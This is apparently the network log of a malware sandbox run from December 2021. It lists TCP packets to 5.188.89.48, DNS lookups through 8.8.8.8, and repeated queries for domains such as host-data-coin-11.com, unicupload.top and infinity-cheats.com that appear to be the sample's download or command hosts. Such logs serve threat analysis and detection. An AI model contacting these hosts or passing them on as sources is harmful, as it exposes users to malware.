                                                                                                                                                        Dec 28, 2021 03:22:56.363398075 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.363466978 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.363506079 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.363544941 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.363552094 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.363584995 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.363595963 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.363626003 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.363667011 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.363703012 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.363713026 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.363743067 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.363744020 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.363782883 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.364187956 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.426696062 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.426755905 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.426796913 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.426834106 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.426851034 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.426873922 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.426887035 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.426913977 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.426954031 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.426994085 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427010059 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.427031994 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427035093 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.427071095 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427109957 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427145958 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427155018 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.427187920 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427191973 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.427227020 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427265882 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427313089 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427318096 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.427351952 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427364111 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.427391052 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427428961 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427468061 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.427479982 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.427512884 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.490585089 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.490648031 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.490689039 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.490725994 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.490755081 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.490767002 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.490796089 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.490808010 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.490847111 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.490886927 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.490909100 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.490926027 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.490955114 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.490966082 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.491007090 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.491046906 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.491060019 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.491086006 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.491101027 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.491126060 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.491154909 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.491193056 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.491210938 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.491230965 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.491239071 CET4974780192.168.2.35.188.89.48
                                                                                                                                                        Dec 28, 2021 03:22:56.491269112 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.491311073 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.491349936 CET80497475.188.89.48192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:56.491364956 CET4974780192.168.2.35.188.89.48

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Dec 28, 2021 03:22:55.150916100 CET5804553192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:22:55.169572115 CET53580458.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:55.386603117 CET5745953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:22:55.699743986 CET53574598.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:55.889966965 CET5787553192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:22:56.204132080 CET53578758.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:58.095442057 CET5415453192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:22:58.383040905 CET53541548.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:58.613454103 CET6402153192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:22:58.926264048 CET53640218.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:59.222212076 CET6078453192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:22:59.242784023 CET53607848.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:59.443001986 CET5114353192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:22:59.461976051 CET53511438.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:59.684220076 CET5600953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:22:59.702646971 CET53560098.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:22:59.897238016 CET4957253192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:22:59.915798903 CET53495728.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:01.451529980 CET5510253192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:01.470591068 CET53551028.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:01.693310976 CET5652753192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:01.711071968 CET53565278.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:02.217704058 CET4955953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:02.531599998 CET53495598.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:02.708514929 CET6329753192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:02.725339890 CET53632978.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:02.928242922 CET5361553192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:02.944960117 CET53536158.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:11.153012991 CET5677353192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:11.172437906 CET53567738.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:11.444331884 CET6098253192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:11.462960958 CET53609828.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:11.665200949 CET5805853192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:11.683669090 CET53580588.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:11.909213066 CET6436753192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:12.011408091 CET53643678.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:12.056078911 CET5153953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:12.075032949 CET53515398.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:12.301708937 CET5539353192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:12.320799112 CET53553938.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:12.530164957 CET5058553192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:12.549226046 CET53505858.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:12.740451097 CET6345653192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:13.748475075 CET6345653192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:14.771740913 CET53634568.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:14.794296980 CET5854053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:14.813018084 CET53585408.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:15.006517887 CET5510853192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:15.025496006 CET53551088.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:15.220599890 CET5894253192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:15.507180929 CET53589428.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:15.783905029 CET53634568.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:17.499511957 CET4925053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:17.519603014 CET53492508.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:17.724150896 CET6349053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:17.741137028 CET53634908.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:17.927736044 CET6511053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:17.947475910 CET53651108.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:18.135525942 CET6112053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:18.157324076 CET53611208.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:20.133779049 CET5307953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:20.486973047 CET53530798.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:21.440092087 CET5082453192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:21.749067068 CET53508248.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:22.454194069 CET5670653192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:22.474263906 CET53567068.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:23.356036901 CET5356953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:23.374758959 CET53535698.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:24.059525013 CET6285553192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:24.076189995 CET53628558.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:24.316589117 CET5104653192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:24.339793921 CET53510468.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:26.354748964 CET6550153192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:26.372894049 CET53655018.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:26.635445118 CET5346553192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:26.653476954 CET53534658.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:26.845761061 CET4929053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:26.862257957 CET53492908.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:48.158132076 CET5872053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:48.176949978 CET53587208.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:48.372364998 CET5744753192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:48.391206980 CET53574478.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:48.633774996 CET6358353192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:48.652209997 CET53635838.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:49.635706902 CET6409953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:49.947416067 CET53640998.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:50.520814896 CET6461053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:50.538045883 CET53646108.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:50.732245922 CET5198953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:50.750871897 CET53519898.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:50.947036982 CET5315253192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:50.965013027 CET53531528.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:51.180335999 CET6159053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:51.199176073 CET53615908.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:51.396169901 CET5607753192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:51.413188934 CET53560778.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:51.656483889 CET5795153192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:51.673461914 CET53579518.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:51.873634100 CET5327653192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:51.890630007 CET53532768.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:52.162717104 CET6013553192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:52.179511070 CET53601358.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:52.369967937 CET4984953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:52.386827946 CET53498498.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:55.018826962 CET6025353192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:55.037125111 CET53602538.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:55.251041889 CET5870653192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:55.269539118 CET53587068.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:55.505115032 CET6267753192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:55.521550894 CET53626778.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:55.717533112 CET6259553192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:56.078768969 CET53625958.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:56.291511059 CET5118953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:56.309621096 CET53511898.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:58.016827106 CET4996753192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:58.035552025 CET53499678.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:58.316298962 CET5145453192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:58.335232973 CET53514548.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:58.533104897 CET5716353192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:58.552124023 CET53571638.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:23:59.141510963 CET5636053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:23:59.158548117 CET53563608.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:02.442754984 CET4925853192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:02.459752083 CET53492588.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:02.654723883 CET5619553192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:02.673703909 CET53561958.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:02.899924040 CET5302153192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:02.918525934 CET53530218.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:03.112284899 CET5261853192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:03.132446051 CET53526188.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:03.637275934 CET5163353192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:03.657280922 CET53516338.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:05.919442892 CET6438353192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:05.938266039 CET53643838.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:05.985217094 CET5034653192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:06.002180099 CET53503468.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:06.131762028 CET5028153192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:06.148346901 CET53502818.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:06.377129078 CET5632853192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:06.396037102 CET53563288.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:06.538320065 CET5692153192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:06.563693047 CET53569218.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:06.570647955 CET5952953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:07.583118916 CET5952953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:07.602219105 CET53595298.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:08.723823071 CET5631753192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:08.743004084 CET53563178.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:09.067429066 CET5157053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:09.086241007 CET53515708.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:09.304661989 CET5366353192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:09.325010061 CET53536638.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:09.873713017 CET6007053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:10.048386097 CET53600708.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:10.251799107 CET5875053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:10.272886992 CET53587508.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:10.797369957 CET6072753192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:10.816524982 CET53607278.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:10.820465088 CET6375353192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:10.837451935 CET53637538.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:11.167680025 CET5460953192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:11.184557915 CET53546098.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:17.069612026 CET5231253192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:17.097075939 CET53523128.8.8.8192.168.2.3
                                                                                                                                                        Dec 28, 2021 03:24:24.563666105 CET5913053192.168.2.38.8.8.8
                                                                                                                                                        Dec 28, 2021 03:24:24.733727932 CET53591308.8.8.8192.168.2.3

                                                                                                                                                        ICMP Packets

                                                                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                        Dec 28, 2021 03:23:15.785037041 CET192.168.2.38.8.8.8cff6(Port unreachable)Destination Unreachable

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                        Dec 28, 2021 03:22:55.150916100 CET192.168.2.38.8.8.80x191Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:55.386603117 CET192.168.2.38.8.8.80x1ab8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:55.889966965 CET192.168.2.38.8.8.80x14d8Standard query (0)privacytools-foryou-777.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:58.095442057 CET192.168.2.38.8.8.80x3e6bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:58.613454103 CET192.168.2.38.8.8.80x7c97Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:59.222212076 CET192.168.2.38.8.8.80x5c4bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:59.443001986 CET192.168.2.38.8.8.80xb751Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:59.684220076 CET192.168.2.38.8.8.80x4edfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:22:59.897238016 CET192.168.2.38.8.8.80x1ec0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:01.451529980 CET192.168.2.38.8.8.80xcd02Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:01.693310976 CET192.168.2.38.8.8.80xed45Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:02.217704058 CET192.168.2.38.8.8.80x669Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:02.708514929 CET192.168.2.38.8.8.80x382Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:02.928242922 CET192.168.2.38.8.8.80x2732Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:11.153012991 CET192.168.2.38.8.8.80x8de7Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:11.444331884 CET192.168.2.38.8.8.80xc23eStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:11.665200949 CET192.168.2.38.8.8.80x7b85Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:11.909213066 CET192.168.2.38.8.8.80xc31eStandard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:12.056078911 CET192.168.2.38.8.8.80xbeaeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:12.301708937 CET192.168.2.38.8.8.80xcfa9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:12.530164957 CET192.168.2.38.8.8.80x4378Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:12.740451097 CET192.168.2.38.8.8.80x1237Standard query (0)infinity-cheats.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:13.748475075 CET192.168.2.38.8.8.80x1237Standard query (0)infinity-cheats.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:14.794296980 CET192.168.2.38.8.8.80x6edeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:15.006517887 CET192.168.2.38.8.8.80x559dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:15.220599890 CET192.168.2.38.8.8.80xc570Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:17.499511957 CET192.168.2.38.8.8.80x58d3Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:17.724150896 CET192.168.2.38.8.8.80xccb0Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:17.927736044 CET192.168.2.38.8.8.80x32a9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:18.135525942 CET192.168.2.38.8.8.80xef62Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:20.133779049 CET192.168.2.38.8.8.80xb78bStandard query (0)file-file-host4.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:21.440092087 CET192.168.2.38.8.8.80x1742Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:22.454194069 CET192.168.2.38.8.8.80x2a43Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:23.356036901 CET192.168.2.38.8.8.80x3227Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:24.059525013 CET192.168.2.38.8.8.80x7aacStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:24.316589117 CET192.168.2.38.8.8.80x9f5cStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:26.354748964 CET192.168.2.38.8.8.80xee96Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                                                        Dec 28, 2021 03:23:26.635445118 CET192.168.2.38.8.8.80x9aeStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
